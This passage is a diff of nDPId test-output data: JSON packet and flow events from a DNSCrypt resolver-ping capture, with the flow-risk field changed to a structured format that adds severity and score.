AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":577,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAABQ1vYAuX4RQfUKAAABF29KzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":577,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":578,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAABQ1vUAuX4RQfYKAAABF29KzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":578,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAXc1vcgAH4RHSEKAAABF29KzerRAbsGBKkvS8QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":580,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAABQ1vcAuX4RQfQKAAABF29KzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":580,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":946739402352,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739402352,"pkt":"ZmZmZmZmRERERERECABFAADUpqhAADURe3gXb0rNCgAAAQG76MMAwNUkS8OBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADFMi1FdTWI6xs9AIHJqo\/A+wDfjlj3WkVYnoIQAvOP3ISfoMelOBqvsYElaECIkBkM1KRmWo7IwtwzQE5GK6ICxIfEdneiwuXVbSuJIibtWiAHFQr52HeEOQNDYtX2pkLEh8R2d6LC5QAAAAFfU1VGX1Smxg=="}
@@ -1287,304 +1287,304 @@
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":946739402356,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739402356,"pkt":"ZmZmZmZmRERERERECABFAADUpq1AADURe3MXb0rNCgAAAQG76tEAwNMVS8SBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADFMi1FdTWI6xs9AIHJqo\/A+wDfjlj3WkVYnoIQAvOP3ISfoMelOBqvsYElaECIkBkM1KRmWo7IwtwzQE5GK6ICxIfEdneiwuXVbSuJIibtWiAHFQr52HeEOQNDYtX2pkLEh8R2d6LC5QAAAAFfU1VGX1Smxg=="}
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":946739402356,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739402356,"pkt":"ZmZmZmZmRERERERECABFAADUpqlAADURe3cXb0rNCgAAAQG77bQAwNAxS8WBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADFMi1FdTWI6xs9AIHJqo\/A+wDfjlj3WkVYnoIQAvOP3ISfoMelOBqvsYElaECIkBkM1KRmWo7IwtwzQE5GK6ICxIfEdneiwuXVbSuJIibtWiAHFQr52HeEOQNDYtX2pkLEh8R2d6LC5QAAAAFfU1VGX1Smxg=="}
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":946739402357,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739402357,"pkt":"ZmZmZmZmRERERERECABFAADUpqxAADURe3QXb0rNCgAAAQG7hOgAwDkBS8KBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADFMi1FdTWI6xs9AIHJqo\/A+wDfjlj3WkVYnoIQAvOP3ISfoMelOBqvsYElaECIkBkM1KRmWo7IwtwzQE5GK6ICxIfEdneiwuXVbSuJIibtWiAHFQr52HeEOQNDYtX2pkLEh8R2d6LC5QAAAAFfU1VGX1Smxg=="}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312183,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305329,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305453,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312406,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317431,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
